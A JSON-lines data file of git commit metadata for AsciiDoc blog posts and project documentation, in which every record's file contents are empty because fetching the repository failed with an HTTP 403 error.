{"commit":"fc8a94c1f1fc1929de0a7f5336f731a5444da584","subject":"y2b create post Does It Suck? - $15 Smart Watch","message":"y2b create post Does It Suck? - $15 Smart Watch","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-18-Does-It-Suck--15-Smart-Watch.adoc","new_file":"_posts\/2015-12-18-Does-It-Suck--15-Smart-Watch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8858d70775449377fb9877ec855c1c7abeaac3f9","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e0e2bc0962072bfee1e7077ef765706a64cd5b","subject":"y2b create post Unboxing The iPhone X Clone Edition","message":"y2b create post Unboxing The iPhone X Clone Edition","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-24-Unboxing-The-iPhone-X-Clone-Edition.adoc","new_file":"_posts\/2017-10-24-Unboxing-The-iPhone-X-Clone-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47aac923485d95b574024b5af59889f8906ba60a","subject":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2458334e012357c14072d58cbb3da1cd03bb4d80","subject":"Update 2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","message":"Update 2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","new_file":"_posts\/2017-02-14-Episode-88-Arcooda-Been-a-Pinball-Wizard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b28f1aa781ec5b1057b7139379d8a400f8b7b6b0","subject":"update libraries in doc.","message":"update libraries in doc.\n","repos":"nobusugi246\/building-msa-in-30-minutes,nobusugi246\/building-msa-in-30-minutes","old_file":"src\/docs\/asciidoc\/MSAin30min_ja.adoc","new_file":"src\/docs\/asciidoc\/MSAin30min_ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobusugi246\/building-msa-in-30-minutes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c378777abbd557aa7b3c28645f58628d24e105b1","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"261791800efdeec2e7719f682dd06ea1f4fa6711","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-mongodb\/README.adoc","new_file":"plugins\/boteco-plugin-mongodb\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82132343b038a7923c2dda31a5823bb697d643cc","subject":"y2b create post Boxing Week Deals \\\/ New Products","message":"y2b create post Boxing Week Deals \\\/ New Products","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-29-Boxing-Week-Deals--New-Products.adoc","new_file":"_posts\/2011-12-29-Boxing-Week-Deals--New-Products.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73a1c72beb6b11bef23806d49d553240fc4aaf28","subject":"Update 2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","message":"Update 2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","repos":"sakkemo\/blog,sakkemo\/blog,sakkemo\/blog,sakkemo\/blog","old_file":"_posts\/2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","new_file":"_posts\/2016-08-14-Kesan-lopettajais-skumpatjallut.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sakkemo\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1369814bd51099fbd18de291243f18c8503a051a","subject":"Update 2018-12-14-Learn-Programming-the-Right-Way.adoc","message":"Update 2018-12-14-Learn-Programming-the-Right-Way.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-14-Learn-Programming-the-Right-Way.adoc","new_file":"_posts\/2018-12-14-Learn-Programming-the-Right-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da002c04f9f53184ff074c63410fd218c4dbab64","subject":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Feature-or-Bug-Report.adoc'","message":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Feature-or-Bug-Report.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-01-Feature-or-Bug-Report.adoc","new_file":"_posts\/2015-01-01-Feature-or-Bug-Report.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a87fac4bcfb3480c634811730756c980d7230d4c","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45bcd9a81113d842533cc0013728fccaefcca478","subject":"Update 2018-02-05-Think-About-Documents.adoc","message":"Update 2018-02-05-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e95fe39ab8573f0bfc613c6b865dbe6ea3b8ea4a","subject":"Ref Guide: Add master-only page for upgrading to Solr 8 - place for notes for now","message":"Ref Guide: Add master-only page for upgrading to Solr 8 - place for notes for now\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/major-changes-in-solr-8.adoc","new_file":"solr\/solr-ref-guide\/src\/major-changes-in-solr-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8601d3868fff14b8fa72227b0e28b0df76356520","subject":"Update 2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","message":"Update 2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","repos":"vba\/vba.github.io,vba\/vba.github.io,vba\/vba.github.io","old_file":"_posts\/2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","new_file":"_posts\/2015-12-17-Stop-use-jQuery-you-can-do-better-without.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vba\/vba.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8033982f402283957b9690b37a3bd325900ac853","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79199517794ac2400b16e8f534e05f47d5fe7f44","subject":"Update 2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","message":"Update 2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","new_file":"_posts\/2018-03-01-Universal-Site-is-the-new-Accessible-Site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e63ce00f0f1f64d835b1d1ea52f15184bbda6e4","subject":"docs: removed confusing statement.","message":"docs: removed confusing statement.\n","repos":"nazarewk\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,nomoa\/elasticsearch,i-am-Nathan\/elasticsearch,IanvsPoplicola\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,LeoYao\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra5-rc,sreeramjayan\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra5-rc,rajanm\/elasticsearch,mikemccand\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,girirajsharma\/elasticsearch,liweinan0423\/elasticsearch,myelin\/elasticsearch,coding0011\/elasticsearch,awislowski\/elasticsearch,nezirus\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,MaineC\/elasticsearch,maddin2016\/elasticsearch,liweinan0423\/elasticsearch,nomoa\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,fforbeck\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,nomoa\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,myelin\/elasticsearch,vroyer\/elassandra,obourgain\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,glefloch\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sreeramjayan\/elasticsearch,cwurm\/elasticsearch,sreeramjayan\/elasticsearch,jimczi\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,yanjunh\/elasticsearch,StefanGor\/elasticsearch,vroyer\/elasticassandra,dongjoon-hyun\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,artnowo\/elasticsearch,winstonewert\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,nezirus\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra5-rc,C-Bish\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,MisterAndersen\/elasticsearch,trangvh\/elasticsearch,glefloch\/elasticsearch,artnowo\/elasticsearch,liweinan0423\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,elasticdog\/elasticsearch,dpursehouse\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,obourgain\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,i-am-Nathan\/elasticsearch,ricardocerq\/elasticsearch,fernandozhu\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,pozhidaevak\/elasticsearch,MaineC\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,a2lin\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,yanjunh\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,Shepard1212\/elasticsearch,lks21c\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,avikurapati\/elasticsearch,nezirus\/elasticsearch,JervyShi\/elasticsearch,camilojd\/elasticsearch,i-am-Nathan\/elasticsearch,glefloch\/elasticsearch,geidies\/elasticsearch,sreeramjayan\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,wuranbo\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,camilojd\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,avikurapati\/elasticsearch,IanvsPoplicola\/elasticsearch,kalimatas\/elasticsearch,JervyShi\/elasticsearch,dongjoon-hyun\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,gmarz\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,dongjoon-hyun\/elasticsearch,zkidkid\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,fernandozhu\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,trangvh\/elasticsearch,fernandozhu\/elasticsearch,myelin\/elasticsearch,mikemccand\/elasticsearch,LewayneNaidoo\/elasticsearch,myelin\/elasticsearch,trangvh\/elasticsearch,LewayneNaidoo\/elasticsearch,MisterAndersen\/elasticsearch,palecur\/elasticsearch,dpursehouse\/elasticsearch,nknize\/elasticsearch,girirajsharma\/elasticsearch,s1monw\/elasticsearch,liweinan0423\/elasticsearch,awislowski\/elasticsearch,zkidkid\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,cwurm\/elasticsearch,glefloch\/elasticsearch,vroyer\/elasticassandra,IanvsPoplicola\/elasticsearch,nomoa\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,shreejay\/elasticsearch,gmarz\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,cwurm\/elasticsearch,awislowski\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,JervyShi\/elasticsearch,trangvh\/elasticsearch,rajanm\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsearch,sreeramjayan\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,ricardocerq\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,fred84\/elasticsearch,nazarewk\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,jimczi\/elasticsearch,avikurapati\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,awislowski\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,spiegela\/elasticsearch,Shepard1212\/elasticsearch,artnowo\/elasticsearch,Stacey-Gammon\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra5-rc,mikemccand\/elasticsearch,naveenhooda2000\/elasticsearch,coding0011\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,henakamaMSFT\/elasticsearch,spiegela\/elasticsearch,a2lin\/elasticsearch,sreeramjayan\/elasticsearch,nknize\/elasticsearch,obourgain\/elasticsearch,HonzaKral\/elasticsearch,Shepard1212\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,camilojd\/elasticsearch,rlugojr\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,zkidkid\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,i-am-Nathan\/elasticsearch,yanjunh\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,camilojd\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,masaruh\/elasticsearch,JackyMai\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,gmarz\/elasticsearch,winstonewert\/elasticsearch,jimczi\/elasticsearch,nilabhsagar\/elasticsearch,JackyMai\/elasticsearch,ricardocerq\/elasticsearch,rlugojr\/elasticsearch,alexshadow007\/elasticsearch,ricardocerq\/elasticsearch,Helen-Zhao\/elasticsearch,LewayneNaidoo\/elasticsearch,bawse\/elasticsearch,ricardocerq\/elasticsearch,palecur\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,gmarz\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,dpursehouse\/elasticsearch,myelin\/elasticsearch,maddin2016\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,avikurapati\/elasticsearch,dongjoon-hyun\/elasticsearch,GlenRSmith\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,cwurm\/elasticsearch,gingerwizard\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,zkidkid\/elasticsearch,avikurapati\/elasticsearch,wangtuo\/elasticsearch,nomoa\/elasticsearch,dongjoon-hyun\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,awislowski\/elasticsearch,markwalkom\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elasticassandra,jimczi\/elasticsearch,girirajsharma\/elasticsearch,wangtuo\/elasticsearch,cwurm\/elasticsearch,girirajsharma\/elasticsearch,Helen-Zhao\/elasticsearch,sneivandt\/elasticsearch,nilabhsagar\/elasticsearch,wenpos\/elasticsearch,MaineC\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,scottsom\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,palecur\/elasticsearch,mortonsykes\/elasticsearch,henakamaMSFT\/elasticsearch,dpursehouse\/elasticsearch,scorpionvicky\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,trangvh\/elasticsearch,nilabhsagar\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,wuranbo\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra5-rc,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,dpursehouse\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,palecur\/elasticsearch,palecur\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,mjason3\/elasticsearch,JervyShi\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,mohit\/elasticsearch","old_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22ffd152b15eb7991f349e1467c29f797030dd4c","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98e670b5eb4e045f96c5105493cc14efa1b2aaad","subject":"Update 2016-01-18-md5-crack-tool.adoc","message":"Update 2016-01-18-md5-crack-tool.adoc","repos":"buchedan\/buchedan.github.io,buchedan\/buchedan.github.io,buchedan\/buchedan.github.io","old_file":"_posts\/2016-01-18-md5-crack-tool.adoc","new_file":"_posts\/2016-01-18-md5-crack-tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buchedan\/buchedan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef7c7505efe0ec49172c5e7b7161aa9f4eedd262","subject":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","message":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","repos":"LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io","old_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Desarrollo-FullStack\/Desarrollo-FullStack.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b84cf09e84d1e824a36b87712752bd45c46221c","subject":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","message":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f859d281481eb6953faa693b10f2ce3cae77bd0e","subject":"Draft of adding new devices","message":"Draft of adding new devices","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/adding-new-devices.adoc","new_file":"modules\/adding-new-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ac8a256c3378188f193f36d03504f5a07320978","subject":"add core.async blog post","message":"add core.async blog post\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2013\/06\/28\/clojure-clore-async-channels.adoc","new_file":"content\/news\/2013\/06\/28\/clojure-clore-async-channels.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 